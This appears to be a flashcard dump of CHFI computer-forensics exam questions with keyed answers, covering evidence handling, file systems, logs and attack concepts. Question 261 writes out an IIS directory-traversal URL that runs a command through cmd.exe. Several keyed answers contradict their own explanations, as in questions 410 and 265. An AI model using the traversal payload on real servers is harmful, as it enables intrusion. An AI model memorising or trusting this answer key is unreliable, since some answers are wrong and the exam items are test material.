CHFI-11

Réussis tes devoirs et examens dès maintenant avec Quizwiz!

QUESTION 93 First response to an incident may involve three different groups of people, and each will have differing skills and need to carry out differing tasks based on the incident. Who is responsible for collecting, preserving, and packaging electronic evidence? A. System administrators B. Local managers or other non-forensic staff C. Forensic laboratory staff D. Lawyers

Answer: C

QUESTION 159 Which of the following is not a part of the technical specification of the laboratory-based imaging system? A. High performance workstation PC B. Remote preview and imaging pod C. Anti-repudiation techniques D. very low image capture rate

Answer: D

QUESTION 461 What is the target host IP in the following command? C:\> firewalk -F 80 10.10.150.1 172.16.28.95 -p UDP A. 10.10.150.1 B. This command is using FIN packets, which cannot scan target hosts C. Firewalk does not scan target hosts D. 172.16.28.95

Answer: D

QUESTION 462 Terri works for a security consulting firm that is currently performing a penetration test on First National Bank in Tokyo. Terri's duties include bypassing firewalls and switches to gain access to the network. Terri sends an IP packet to one of the company's switches with ACK bit and the source address of her machine set. What is Terri trying to accomplish by sending this IP packet? A. Poison the switch's MAC address table by flooding it with ACK bits B. Crash the switch with aDoS attack since switches cannot send ACK bits C. Enable tunneling feature on the switch D. Trick the switch into thinking it already has a session with Terri's computer

Answer: D

QUESTION 50 MAC filtering is a security access control methodology, where a ___________ is assigned to each network card to determine access to the network A. 16-bit address B. 24-bit address C. 32-bit address D. 48-bit address

Answer: D

QUESTION 52 Wireless access control attacks aim to penetrate a network by evading WLAN access control measures, such as AP MAC filters and Wi-Fi port access controls. Which of the following wireless access control attacks allows the attacker to set up a rogue access point outside the corporate perimeter, and then lure the employees of the organization to connect to it? A. War driving B. Rogue access points C. MAC spoofing D. Client mis-association

Answer: D

QUESTION 410 If you plan to startup a suspect's computer, you must modify the ___________ to ensure that you do not contaminate or alter data on the suspect's hard drive by booting to the hard drive. A. deltree command B. CMOS C. Boot.sys D. Scandisk utility E. boot.ini

Answer: E Explanation: The OS isn't specified, but if this was a Windows OS, then this would be boot.ini The Answer is CMOS. The startup of a computer is the boot sequence, and the boot sequence is defined in the CMOS. The common occurrence is to boot off a floppy, and you need to see that the floppy (usually the A drive) is first in the sequence. If you don't, and the hard drive is first, then booting the system wil boot the hard drive and alter the evidence.

QUESTION 10 Which of the following commands shows you the NetBIOS name table each? A. nbtstat -n B. nbtstat -c C. nbtstat -r D. nbtstat -s

Answer: A

QUESTION 101 Email archiving is a systematic approach to save and protect the data contained in emails so that it can tie easily accessed at a later date. A. True B. False

Answer: A

QUESTION 138 At the time of evidence transfer, both sender and receiver need to give the information about date and time of transfer in the chain of custody record. A. True B. False

Answer: A

QUESTION 16 Which Is a Linux journaling file system? A. Ext3 B. HFS C. FAT D. BFS

Answer: A

QUESTION 176 What does the acronym POST mean as it relates to a PC? A. Power On Self Test B. Pre Operational Situation Test C. Primary Operating System Test D. Primary Operations Short Test

Answer: A

QUESTION 181 When performing a forensics analysis, what device is used to prevent the system from recording data on an evidence disk? A. Write-blocker B. Protocol analyzer C. Firewall D. Disk editor

Answer: A

QUESTION 216 The following is a log file screenshot from a default installation of IIS 6.0. What time standard is used by IIS as seen in the screenshot? A. UTC B. GMT C. TAI D. UT

Answer: A

QUESTION 26 LBA (Logical Block Address) addresses data by allotting a ___________to each sector of the hard disk. A. Sequential number B. Index number C. Operating system number D. Sector number

Answer: A

QUESTION 28 SMTP (Simple Mail Transfer protocol) receives outgoing mail from clients and validates source and destination addresses, and also sends and receives emails to and from other SMTP servers. A. True B. False

Answer: A

QUESTION 319 What will the following command accomplish in Linux? fdisk /dev/hda A. Partition the hard drive B. Format the hard drive C. Delete all files under the /dev/hda folder D. Fill the disk with zeros

Answer: A

QUESTION 321 Why should you note all cable connections for a computer you want to seize as evidence? A. to know what outside connections existed B. in case other devices were connected C. to know what peripheral devices exist D. to know what hardware existed

Answer: A

QUESTION 34 An expert witness is a witness, who by virtue of education, profession, or experience, is believed to have special knowledge of his/her subject beyond that of the average person, sufficient that others legally depend upon his/her opinion. A. True B. False

Answer: A

QUESTION 355 With the standard Linux second extended file system (Ext2fs), a file is deleted when the inode internal link count reaches ______ A. 0 B. 1 C. 10 D. 100

Answer: A

QUESTION 407 If a suspect computer is located in an area that may have toxic chemicals, you must: A. coordinate with the HAZMAT team B. determine a way to obtain the suspect computer C. assume the suspect machine is contaminated D. do not enter alone

Answer: A

QUESTION 450 Frank is working on a vulnerability assessment for a company on the West coast. The company hired Frank to assess its network security through scanning, pen tests, and vulnerability assessments. After discovering numerous known vulnerabilities detected by a temporary IDS he set up, he notices a number of items that show up as unknown but ;QUESTIONable in the logs. He looks up the behavior on the Internet, but cannot find anything related. What organization should Frank submit the log to find out if it is a new vulnerability or not? A. CVE B. IANA C. RIPE D. APIPA

Answer: A

QUESTION 46 What is a first sector ("sector zero") of a hard disk? A. Master boot record B. System boot record C. Secondary boot record D. Hard disk boot record

Answer: A

QUESTION 48 Which of the following is the certifying body of forensics labs that investigate criminal cases by analyzing evidence? A. The American Society of Crime Laboratory Directors (ASCLD) B. International Society of Forensics Laboratory (ISFL) C. The American Forensics Laboratory Society (AFLS) D. The American Forensics Laboratory for Computer Forensics (AFLCF)

Answer: A

QUESTION 56 Which device in a wireless local area network (WLAN) determines the next network point to which a packet should be forwarded toward its destination? A. Wireless router B. Wireless modem C. Antenna D. Mobile station

Answer: A

QUESTION 59 International Mobile Equipment Identifier (IMEI) is a 15-dlgit number that indicates the manufacturer, model type, and country of approval for GSM devices. The first eight digits of an IMEI number that provide information about the model and origin of the mobile device is also known as: A. Type Allocation Code (TAC) B. Device Origin Code (DOC) C. Manufacturer identification Code (MIC) D. Integrated Circuit Code (ICC)

Answer: A

QUESTION 65 What is the first step that needs to be carried out to crack the password? A. A word list is created using a dictionary generator program or dictionaries B. The list of dictionary words is hashed or encrypted C. The hashed wordlist is compared against the target hashed password, generally one word at a time D. If it matches, that password has been cracked and the password cracker displays the unencrypted version of the password

Answer: A

QUESTION 70 Web applications provide an Interface between end users and web servers through a set of web pages that are generated at the server-end or contain script code to be executed dynamically within the client Web browser. A. True B. False

Answer: A

QUESTION 77 Syslog is a client/server protocol standard for forwarding log messages across an IP network. Syslog uses ___________to transfer log messages in a clear text format. A. TCP B. FTP C. SMTP D. POP

Answer: A

QUESTION 81 If the partition size Is 4 GB, each cluster will be 32 K. Even If a file needs only 10 K, the entire 32 K will be allocated, resulting In 22 K of___________. A. Slack space B. Deleted space C. Cluster space D. Sector space

Answer: A

QUESTION 94 Quality of a raster Image is determined by the _________________and the amount of information in each pixel. A. Total number of pixels B. Image file format C. Compression method D. Image file size

Answer: A

QUESTION 294 E-mail logs contain which of the following information to help you in your investigation? (Select up to 4) A. user account that was used to send the account B. attachments sent with the e-mail message C. unique message identifier D. contents of the e-mail message E. date and time the message was sent

Answer: ACDE

QUESTION 170 What is one method of bypassing a system BIOS password? A. Removing the processor B. Removing the CMOS battery C. Remove all the system memoryRemove all the system? memory D. Login to Windows and disable the BIOS password

Answer: B

QUESTION 188 Where does Encase search to recover NTFS files and folders? A. MBR B. MFT C. Slack space D. HAL

Answer: B

QUESTION 222 What feature of Decryption Collection allows an investigator to crack a password as quickly as possible? A. Cracks every password in 10 minutes B. Distribute processing over 16 or fewer computers C. Support for Encrypted File System D. Support for MD5 hash verification

Answer: B

QUESTION 251 In a computer forensics investigation, what describes the route that evidence takes from the time you find it until the case is closed or goes to court? A. Policy of separation B. Chain of custody C. Rules of evidence D. Law of probability

Answer: B

QUESTION 252 As a CHFI professional, which of the following is the most important to your professional reputation? A. Your Certifications B. The correct, successful management of each and every case C. The free that you charge D. The friendship of local law enforcement officers

Answer: B

QUESTION 291 Which forensic investigating concept trails the whole incident from how the attack began to how the victim was affected? A. Point-to-point B. End-to-end C. Thorough D. Complete event analysis

Answer: B

QUESTION 331 Sectors in hard disks typically contain how many bytes? A. 256 B. 512 C. 1024 D. 2048

Answer: B

QUESTION 341 Software firewalls work at which layer of the OSI model? A. Transport B. Application C. Data Link D. Network

Answer: B

QUESTION 36 When dealing with the powered-off computers at the crime scene, if the computer is switched off, turn it on A. True B. False

Answer: B

QUESTION 394 What TCP/UDP port does the toolkit program netstat use? A. Port 7 B. Port 15 C. Port 23 D. Port 69

Answer: B

QUESTION 399 When cataloging digital evidence, the primary goal is to A. Make bit-stream images of all hard drives B. Preserve evidence integrity C. Not remove the evidence from the scene D. Not allow the computer to be turned off

Answer: B

QUESTION 43 Which one of the following statements is not correct while preparing for testimony? A. Go through the documentation thoroughly B. Do not determine the basic facts of the case before beginning and examining the evidence C. Establish early communication with the attorney D. Substantiate the findings with documentation and by collaborating with other computer forensics professionals

Answer: B

QUESTION 430 Which of the following should a computer forensics lab used for investigations have? A. isolation B. restricted access C. open access D. an entry log

Answer: B

QUESTION 45 An intrusion detection system (IDS) gathers and analyzes information from within a computer or a network to identify any possible violations of security policy, including unauthorized access, as well as misuse. Which of the following intrusion detection systems audit events that occur on a specific host? A. Network-based intrusion detection B. Host-based intrusion detection C. Log file monitoring D. File integrity checking

Answer: B

QUESTION 470 What is kept in the following directory? HKLM\SECURITY\Policy\Secrets A. IAS account names and passwords B. Service account passwords in plain text C. Local store PKI Kerberos certificates D. Cached password hashes for the past 20 users

Answer: B

QUESTION 481 Attacker uses vulnerabilities in the authentication or session management functions such as exposed accounts, session IDs, logout, password management, timeouts, remember me. secret account update etc. to impersonate users, if a user simply closes the browser without logging out from sites accessed through a public computer, attacker can use the same browser later and exploit the user's privileges. Which of the following vulnerability/exploitation is referred above? A. Session ID in URLs B. Timeout Exploitation C. I/O exploitation D. Password Exploitation

Answer: B

QUESTION 76 Cyber-crime is defined as any Illegal act involving a gun, ammunition, or its applications. A. True B. False

Answer: B

QUESTION 79 Digital evidence is not fragile in nature. A. True B. False

Answer: B

QUESTION 80 Depending upon the Jurisdictional areas, different laws apply to different incidents. Which of the following law is related to fraud and related activity in connection with computers? A. 18 USC 7029 B. 18 USC 1030 C. 18 USC 7361 D. 18 USC 7371

Answer: B

QUESTION 385 Diskcopy is: A. a utility by AccessData B. a standard MS-DOS command C. Digital Intelligence utility D. dd copying tool

Answer: B Explanation: diskcopy is a STANDARD DOS utility. C:\WINDOWS>diskcopy /? Copies the contents of one floppy disk to another.

QUESTION 106 Which of the following would you consider an aspect of organizational security, especially focusing on IT security? A. Biometric information security B. Security from frauds C. Application security D. Information copyright security

Answer: C

QUESTION 122 Computer security logs contain information about the events occurring within an organization's systems and networks. Which of the following security logs contains Logs of network and hostbased security software? A. Operating System (OS) logs B. Application logs C. Security software logs D. Audit logs

Answer: C

QUESTION 134 Which of the following is not a part of data acquisition forensics Investigation? A. Permit only authorized personnel to access B. Protect the evidence from extremes in temperature C. Work on the original storage medium not on the duplicated copy D. Disable all remote access to the system

Answer: C

QUESTION 141 The evolution of web services and their increasing use in business offers new attack vectors in an application framework. Web services are based on XML protocols such as web Services Definition Language (WSDL) for describing the connection points, Universal Description, Discovery, and Integration (UDDI) for the description and discovery of Web services and Simple Object Access Protocol (SOAP) for communication between Web services that are vulnerable to various web application threats. Which of the following layer in web services stack is vulnerable to fault code leaks? A. Presentation Layer B. Security Layer C. Discovery Layer D. Access Layer

Answer: C

QUESTION 152 Which of the following Steganography techniques allows you to encode information that ensures creation of cover for secret communication? A. Substitution techniques B. Transform domain techniques C. Cover generation techniques D. Spread spectrum techniques

Answer: C

QUESTION 155 Data acquisition system is a combination of tools or processes used to gather, analyze and record Information about some phenomenon. Different data acquisition system are used depends on the location, speed, cost. etc. Serial communication data acquisition system is used when the actual location of the data is at some distance from the computer. Which of the following communication standard is used in serial communication data acquisition system? A. RS422 B. RS423 C. RS232 D. RS231

Answer: C

QUESTION 158 Which of the following Wi-Fi chalking methods refers to drawing symbols in public places to advertise open Wi-Fi networks? A. WarWalking B. WarFlying C. WarChalking D. WarDhving

Answer: C

QUESTION 169 You are called by an author who is writing a book and he wants to know how long the copyright for his book will last after he has the book published? A. 70 years B. The life of the author C. The life of the author plus 70 years D. Copyrights last forever

Answer: C

QUESTION 189 To preserve digital evidence, an investigator should ____________ A. Make two copies of each evidence item using a single imaging tool B. Make a single copy of each evidence item using an approved imaging tool C. Make two copies of each evidence item using different imaging tools D. Only store the original evidence item

Answer: C

QUESTION 225 A forensics investigator is searching the hard drive of a computer for files that were recently moved to the Recycle Bin. He searches for files in C:\RECYCLED using a command line tool but does not find anything. What is the reason for this? A. He should search in C:\Windows\System32\RECYCLED folder B. The Recycle Bin does not exist on the hard drive C. The files are hidden and he must use switch to view themThe files are hidden and he must use ? switch to view them D. Only FAT system contains RECYCLED folder and not NTFS

Answer: C

QUESTION 237 George was recently fired from his job as an IT analyst at Pitts and Company in Dallas Texas. His main duties as an analyst were to support the company Active Directory structure and to create network polices. George now wants to break into the company's network by cracking some of the service accounts he knows about. Which password cracking technique should George use in this situation? A. Brute force attack B. Syllable attack C. Rule-based attack D. Dictionary attack

Answer: C

QUESTION 271 The newer Macintosh Operating System (MacOS X) is based on: A. Microsoft Windows B. OS/2 C. BSD Unix D. Linux

Answer: C

QUESTION 289 What stage of the incident handling process involves reporting events? A. Containment B. Follow-up C. Identification D. Recovery

Answer: C

QUESTION 315 In the following email header, where did the email first originate from? A. Somedomain.com B. Smtp1.somedomain.com C. Simon1.state.ok.gov.us D. David1.state.ok.gov.us

Answer: C

QUESTION 359 This organization maintains a database of hash signatures for known software A. International Standards Organization B. Institute of Electrical and Electronics Engineers C. National Software Reference Library D. American National standards Institute

Answer: C

QUESTION 376 Why is it a good idea to perform a penetration test from the inside? A. It is never a good idea to perform a penetration test from the inside B. It is easier to hack from the inside C. Because 70% of attacks are from inside the organization D. To attack a network from a hacker's perspective

Answer: C

QUESTION 418 You are working for a local police department that services a population of 1,000,000 people and you have been given the task of building a computer forensics lab. How many law-enforcement computer investigators should you request to staff the lab? A. 8 B. 1 C. 4 D. 2

Answer: C

QUESTION 447 Office documents (Word, Excel, PowerPoint) contain a code that allows tracking the MAC, or unique identifier, of the machine that created the document. What is that code called? A. the Microsoft Virtual Machine Identifier B. the Personal Application Protocol C. the Globally Unique ID D. the Individual ASCII String

Answer: C

QUESTION 455 When investigating a wireless attack, what information can be obtained from the DHCP logs? A. The operating system of the attacker and victim computersThe operating system of the attacker and victim? computers B. IP traffic between the attacker and the victim C. MAC address of the attacker D. If any computers on the network are running in promiscuous mode

Answer: C

QUESTION 457 When monitoring for both intrusion and security events between multiple computers, it is essential that the computers' clocks are synchronized. Synchronized time allows an administrator to reconstruct what took place during an attack against multiple computers. Without synchronized time, it is very difficult to determine exactly when specific events took place, and how events interlace. What is the name of the service used to synchronize time among multiple computers? A. Time-Sync Protocol B. SyncTime Service C. Network Time Protocol D. Universal Time Set

Answer: C

QUESTION 465 What feature of Windows is the following command trying to utilize? A. White space B. AFS C. ADS D. Slack file

Answer: C

QUESTION 107 During the seizure of digital evidence, the suspect can be allowed touch the computer system. A. True B. False

Answer: B

QUESTION 154 FAT32 is a 32-bit version of FAT file system using smaller clusters and results in efficient storage capacity. What is the maximum drive size supported? A. 1 terabytes B. 2 terabytes C. 3 terabytes D. 4 terabytes

Answer: B

QUESTION 113 When collecting evidence from the RAM, where do you look for data? A. Swap file B. SAM file C. Data file D. Log file

Answer: A

QUESTION 114 What is the first step that needs to be carried out to investigate wireless attacks? A. Obtain a search warrant B. Identify wireless devices at crime scene C. Document the scene and maintain a chain of custody D. Detect the wireless connections

Answer: A

QUESTION 115 What is cold boot (hard boot)? A. It is the process of starting a computer from a powered-down or off state B. It is the process of restarting a computer that is already turned on through the operating system C. It is the process of shutting down a computer from a powered-on or on state D. It is the process of restarting a computer that is already in sleep mode

Answer: A

QUESTION 124 Which of the following file in Novel GroupWise stores information about user accounts? A. ngwguard.db B. gwcheck.db C. PRIV.EDB D. PRIV.STM

Answer: A

QUESTION 126 Mobile phone forensics is the science of recovering digital evidence from a mobile phone under forensically sound conditions. A. True B. False

Answer: A

QUESTION 144 Log management includes all the processes and techniques used to collect, aggregate, and analyze computer-generated log messages. It consists of the hardware, software, network and media used to generate, transmit, store, analyze, and dispose of log data. A. True B. False

Answer: A

QUESTION 261 What will the following URL produce in an unpatched IIS Web Server? http://www.thetargetsite.com/scripts/..% co%af../..%co%af../windows/system32/cmd.exe?/c+dir+c:\ A. Directory listing of C: drive on the web server B. Execute a buffer flow in the C: drive of the web server C. Directory listing of the C:\windows\system32 folder on the web server D. Insert a Trojan horse into the C: drive of the web server

Answer: A

QUESTION 262 Why is it still possible to recover files that have been emptied from the Recycle Bin on a Windows computer? A. The data is still present until the original location of the file is used B. The data is moved to the Restore directory and is kept there indefinitely C. The data will reside in the L2 cache on a Windows computer until it is manually deleted D. It is not possible to recover data that has been emptied from the Recycle Bin

Answer: A

QUESTION 267 During the course of a corporate investigation, you find that an employee is committing a federal crime. Can the employer file a criminal complain with the police? A. Yes, and all evidence can be turned over to the police B. Yes, but only if you turn the evidence over to a district judge C. No, because the investigation was conducted without following standard police procedures D. No, because the investigation was conducted without a warrant

Answer: A

QUESTION 27 Which of the following attacks allows attacker to acquire access to the communication channels between the victim and server to extract the information? A. Man-in-the-middle (MITM) attack B. Replay attack C. Rainbow attack D. Distributed network attack

Answer: A

QUESTION 276 On Linux/Unix based Web servers, what privilege should the daemon service be run under? A. Something other than root B. Root C. Guest D. You cannot determine what privilege runs the daemon service

Answer: A

QUESTION 397 When you carve an image, recovering the image depends on which of the following skills? A. Recognizing the pattern of the header content B. Recovering the image from a tape backup C. Recognizing the pattern of a corrupt file D. Recovering the image from the tape backup

Answer: A

QUESTION 398 When investigating a potential e-mail crime, what is your first step in the investigation? A. Trace the IP address to its origin B. Write a report C. Determine whether a crime was actually committed D. Recover the evidence

Answer: A

QUESTION 4 Centralized logging is defined as gathering the computer system logs for a group of systems in a centralized location. It is used to efficiently monitor computer system logs with the frequency required to detect security violations and unusual activity. A. True B. False

Answer: A

QUESTION 471 When discussing the chain of custody in an investigation, what does a link refer to? A. Someone that takes possession of a piece of evidence B. Evidence that links one piece of evidence to another, like a usb cable C. The most critical piece of evidence in an investigation D. The transportation used when moving evidence

Answer: A

QUESTION 472 Computer security logs contain information about the events occurring within an organization's systems and networks. Application and Web server log files are useful in detecting web attacks. The source, nature, and time of the attack can be determined by _________of the compromised system. A. Analyzing log files B. Analyzing SAM file C. Analyzing rainbow tables D. Analyzing hard disk boot records

Answer: A

QUESTION 476 Operating System logs are most beneficial for Identifying or Investigating suspicious activities involving a particular host. Which of the following Operating System logs contains information about operational actions performed by OS components? A. Event logs B. Audit logs C. Firewall logs D. IDS logs

Answer: A

QUESTION 480 Volatile information can be easily modified or lost when the system is shut down or rebooted. It helps to determine a logical timeline of the security incident and the users who would be responsible. A. True B. False

Answer: A

QUESTION 482 Which table is used to convert huge word lists (i .e. dictionary files and brute-force lists) into password hashes? A. Rainbow tables B. Hash tables C. Master file tables D. Database tables

Answer: A

QUESTION 483 Consistency in the investigative report is more important than the exact format in the report to eliminate uncertainty and confusion. A. True B. False

Answer: A

QUESTION 486 The Recycle Bin is located on the Windows desktop. When you delete an item from the hard disk, Windows sends that deleted item to the Recycle Bin and the icon changes to full from empty, but items deleted from removable media, such as a floppy disk or network drive, are not stored in the Recycle Bin. What is the size limit for Recycle Bin in Vista and later versions of the Windows? A. No size limit B. Maximum of 3.99 GB C. Maximum of 4.99 GB D. Maximum of 5.99 GB

Answer: A

QUESTION 49 When a system is compromised, attackers often try to disable auditing, in Windows 7; modifications to the audit policy are recorded as entries of Event ID____________. A. 4902 B. 3902 C. 4904 D. 3904

Answer: A

QUESTION 490 What document does the screenshot represent? A. Chain of custody form B. Search warrant form C. Evidence collection form D. Expert witness form

Answer: A

QUESTION 491 Watson, a forensic investigator, is examining a copy of an ISO file stored in CDFS format. What type of evidence is this? A. Data from a CD copied using Windows B. Data from a CD copied using Mac-based system C. Data from a DVD copied using Windows system D. Data from a CD copied using Linux system

Answer: A

QUESTION 5 Which wireless standard has bandwidth up to 54 Mbps and signals in a regulated frequency spectrum around 5 GHz? A. 802.11a B. 802.11b C. 802.11g D. 802.11i

Answer: A

QUESTION 51 Files stored in the Recycle Bin in its physical location are renamed as Dxy.ext, where, "X" represents the _________. A. Drive name B. Sequential number C. Original file name's extension D. Original file name

Answer: A

QUESTION 53 When collecting electronic evidence at the crime scene, the collection should proceed from the most volatile to the least volatile A. True B. False

Answer: A

QUESTION 55 Microsoft Security IDs are available in Windows Registry Editor. The path to locate IDs in Windows 7 is: A. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion \ProfileList B. HKEY_LOCAL_MACHlNE\SOFTWARE\Microsoft\Windows NT\CurrentVersion \NetworkList C. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentsVersion \setup D. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule

Answer: A

QUESTION 58 The ARP table of a router comes in handy for Investigating network attacks, as the table contains IP addresses associated with the respective MAC addresses. The ARP table can be accessed using the __________command in Windows 7. A. C:\arp -a B. C:\arp -d C. C:\arp -s D. C:\arp -b

Answer: A

QUESTION 6 Hash injection attack allows attackers to inject a compromised hash into a local session and use the hash to validate network resources. A. True B. False

Answer: A

QUESTION 60 Who is responsible for the following tasks? - Secure the scene and ensure that it is maintained In a secure state until the Forensic Team advises- Make notes about the scene that will eventually be handed over to the Forensic Team A. Non-Laboratory Staff B. System administrators C. Local managers or other non-forensic staff D. Lawyers

Answer: A

QUESTION 406 What header field in the TCP/IP protocol stack involves the hacker exploit known as the Ping of Death? A. ICMP header field B. TCP header field C. IP header field D. UDP header field

Answer: A Explanation: The Ping of Death occurs when the ICMP Header field contains a packet size lager than 65507 bytes.

QUESTION 363 You setup SNMP in multiple offices of your company. Your SNMP software manager is not receiving data from other offices like it is for your main office. You suspect that firewall changes are to blame. What ports should you open for SNMP to work through Firewalls (Select 2) A. 161 B. 162 C. 163 D. 160

Answer: AB

QUESTION 437 The rule of thumb when shutting down a system is to pull the power plug. However, it has certain drawbacks. Which of the following would that be? A. Any data not yet flushed to the system will be lost B. All running processes will be lost C. The /tmp directory will be flushed D. Power interruption will corrupt the pagefile

Answer: AB Explanation: Volitile memory will be lost. Data is not flushed to the system, it is flushed to the disk.

QUESTION 156 Network forensics allows Investigators to inspect network traffic and logs to identify and locate the attack system. Network forensics can reveal: (Select three Answers) A. Source of security incidents' and network attacks B. Path of the attack C. Intrusion techniques used by attackers D. Hardware configuration of the attacker's system

Answer: ABC

QUESTION 257 Area density refers to: A. the amount of data per disk B. the amount of data per partition C. the amount of data per square inch D. the amount of data per platter

Answer: AC

QUESTION 288 Volatile Memory is one of the leading problems for forensics. Worms such as code Red are memory resident and do not write themselves to the hard drive, if you turn the system off they disappear. In a lab environment, which of the following options would you suggest as the most appropriate to overcome the problem of capturing volatile memory? A. Use Vmware to be able to capture the data in memory and examine it B. Give the Operating System a minimal amount of memory, forcing it to use a swap file C. Create a Separate partition of several hundred megabytes and place the swap file there D. Use intrusion forensic techniques to study memory resident infections

Answer: AC

QUESTION 368 You have completed a forensic investigation case. You would like to destroy the data contained in various disks at the forensics lab due to sensitivity of the case. How would you permanently erase the data on the hard disk? A. Throw the hard disk into the fire B. Run the powerful magnets over the hard disk C. Format the hard disk multiple times using a low level disk utility D. Overwrite the contents of the hard disk with Junk data

Answer: AC Explanation: To be effective with throwing the hard drive into the fire, the fire would have to be hot enough to melt the platters into molten metal, which requires an industrial furnance. This requires special facilities. Running powerful magnets over the disk, such as degaussing the disk, may destroy the data, but may also be ineffective. In some cases, the degaussing process for tape and disk may render the disk unusable for use again. (of course throwing the drives into a furnance also guarantee that as well). Formatting the disk multiple times with a low level disk utility is the best way to go, and still beable to re-use the disk for later projects. The keys are "multiple" and "low level". A low level format is typicall a slow, thorough, format that is a wipe. Multiple ?as opposed to once ?is recommended. There is a theory on "how many times", some schools say at least three times. The problem with this Answer is that with newer drives, such as ATA and SCSI, low level formats can destroy the volumes as well, and some BIOS may actually ignore the LLF directives. Overwritting the disk with junk data would perform some form of wipe because the old data is wiped out, but still may be recoverd. Note: According to some websites: Physical Methods that will not work to destroy data on a hard drive include:Throwing it in the water (this does not do much)Setting it on fire (the temperature is not going to be high enough at home)Throwing it out of the window. Hard drives can take quite a bit of G force. They are not heavy so the impact of the hard drive on the ground is not likely to destroy the platters.Drive over the hard drive. A car, or even a tank, driving over a hard drive will do nothing, any more than they would driving over a book. Unless the drive is actually flattened, the platters are not going to be destroyed

QUESTION 265 Which part of the Windows Registry contains the user's password file? A. HKEY_LOCAL_MACHINE B. HKEY_CURRENT_CONFIGURATION C. HKEY_USER D. HKEY_CURRENT_USER

Answer: AD Explanation: The Answer is HKEY_CURRENT_USER\Identities\{VALUE} Note the "user's" password file will be user specific, the Local Machine is the machine information

QUESTION 100 File signature analysis involves collecting information from the __________ of a file to determine the type and function of the file A. First 10 bytes B. First 20 bytes C. First 30 bytes D. First 40 bytes

Answer: B

QUESTION 119 Which of the following is not an example of a cyber-crime? A. Fraud achieved by the manipulation of the computer records B. Firing an employee for misconduct C. Deliberate circumvention of the computer security systems D. Intellectual property theft, including software piracy

Answer: B

QUESTION 125 Billy, a computer forensics expert, has recovered a large number of DBX files during forensic investigation of a laptop. Which of the following email clients he can use to analyze the DBX files? A. Microsoft Outlook B. Microsoft Outlook Express C. Mozilla Thunderoird D. Eudora

Answer: B

QUESTION 127 File deletion is a way of removing a file from a computer's file system. What happens when a file is deleted in windows7? A. The last letter of a file name is replaced by a hex byte code E5h B. The operating system marks the file's name in the MFT with a special character that indicates that the file has been deleted C. Corresponding clusters in FAT are marked as used D. The computer looks at the clusters occupied by that file and does not avails space to store a new file

Answer: B

QUESTION 135 You have been given the task to investigate web attacks on a Windows-based server. Which of the following commands will you use to look at which sessions the machine has opened with other systems? A. Net sessions B. Net use C. Net config D. Net share

Answer: B

QUESTION 140 The disk in the disk drive rotates at high speed, and heads in the disk drive are used only to read data. A. True B. False

Answer: B

QUESTION 145 Which of the following password cracking techniques works like a dictionary attack, but adds some numbers and symbols to the words from the dictionary and tries to crack the password? A. Brute forcing attack B. Hybrid attack C. Syllable attack D. Rule-based attack

Answer: B

QUESTION 150 An image is an artifact that reproduces the likeness of some subject. These are produced by optical devices (i.e. cameras, mirrors, lenses, telescopes, and microscopes). Which property of the image shows you the number of colors available for each pixel in an image? A. Pixel B. Bit Depth C. File Formats D. Image File Size

Answer: B

QUESTION 153 Data files from original evidence should be used for forensics analysis A. True B. False

Answer: B

QUESTION 160 BMP (Bitmap) is a standard file format for computers running the Windows operating system. BMP images can range from black and white (1 bit per pixel) up to 24 bit color (16.7 million colors). Each bitmap file contains header, the RGBQUAD array, information header, and image data. Which of the following element specifies the dimensions, compression type, and color format for the bitmap? A. Header B. The RGBQUAD array C. Information header D. Image data

Answer: B

QUESTION 163 Ron. a computer forensics expert, Is Investigating a case involving corporate espionage. He has recovered several mobile computing devices from the crime scene. One of the evidence that Ron possesses is a mobile phone from Nokia that was left in on condition. Ron needs to recover the IMEI number of the device to establish the identity of the device owner. Which of the following key combinations he can use to recover the IMEI number? A. #*06*# B. *#06# C. #06r D. *1MEI#

Answer: B

QUESTION 168 What type of file is represented by a colon (:) with a name following it in the Master File Table (MFT) of an NTFS disk? A. Compressed file B. Data stream file C. Encrypted file D. Reserved file

Answer: B

QUESTION 175 In conducting a computer abuse investigation you become aware that the suspect of the investigation is using ABC Company as his Internet Service Provider (ISP). You contact the ISP and request that they provide you assistance with your investigation. What assistance can the ISP provide? A. The ISP can investigate anyone using their service and can provide you with assistance B. The ISP can investigate computer abuse committed by their employees, but must preserve the privacy of their customers and therefore cannot assist you without a warrant C. The ISP cannot conduct any type of investigations on anyone and therefore cannot assist you D. ISPs never maintain log files so they would be of no use to your investigation

Answer: B

QUESTION 178 What method of copying should always be performed first before carrying out an investigation? A. Parity-bit copy B. Bit-stream copy C. MS-DOS disc copy D. System level copy

Answer: B

QUESTION 179 You are working in the Security Department of a law firm. One of the attorneys asks you about the topic of sending fake email because he has a client who has been charged with doing just that. His client alleges that he is innocent and that there is no way for a fake email to actually be sent. You inform the attorney that his client is mistaken and that fake email is a possibility and that you can prove it. You return to your desk and craft a fake email to the attorney that appears to come from his boss. What port do you send the email to on the company SMTP server?fake email to the attorney that appears to come from his boss. What port do you send the email to on the company? SMTP server? A. 10 B. 25 C. 110 D. 135

Answer: B

QUESTION 182 What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer? A. Key escrow B. Steganography C. Rootkit D. Offset

Answer: B

QUESTION 389 In handling computer-related incidents, which IT role should be responsible for recovery, containment, and prevention to constituents? A. Security Administrator B. Network Administrator C. Director of Information Technology D. Director of Administration

Answer: B

QUESTION 69 Which of the following network attacks refers to sending huge volumes of email to an address in an attempt to overflow the mailbox, or overwhelm the server where the email address is hosted, to cause a denial-of-service attack? A. Email spamming B. Mail bombing C. Phishing D. Email spoofing

Answer: B

QUESTION 82 Deposition enables opposing counsel to preview an expert witness's testimony at trial. Which of the following deposition is not a standard practice? A. Both attorneys are present B. Only one attorneys is present C. No jury or judge D. Opposing counsel asks ;QUESTIONs

Answer: B

QUESTION 414 Harold is finishing up a report on a case of network intrusion, corporate spying, and embezzlement that he has been working on for over six months. He is trying to find the right term to use in his report to describe network-enabled spying. What term should Harold use? A. Spycrack B. Spynet C. Netspionage D. Hackspionage

Answer: C

QUESTION 431 Jonathan is a network administrator who is currently testing the internal security of his network. He is attempting to hijack a session, using Ettercap, of a user connected to his Web server. Why A. Only FTP traffic can be hijacked B. Only an HTTPS session can be hijacked C. HTTP protocol does not maintain session D. Only DNS traffic can be hijacked

Answer: C

QUESTION 434 Printing under a Windows Computer normally requires which one of the following files types to be created? A. EME B. MEM C. EMF D. CME

Answer: C

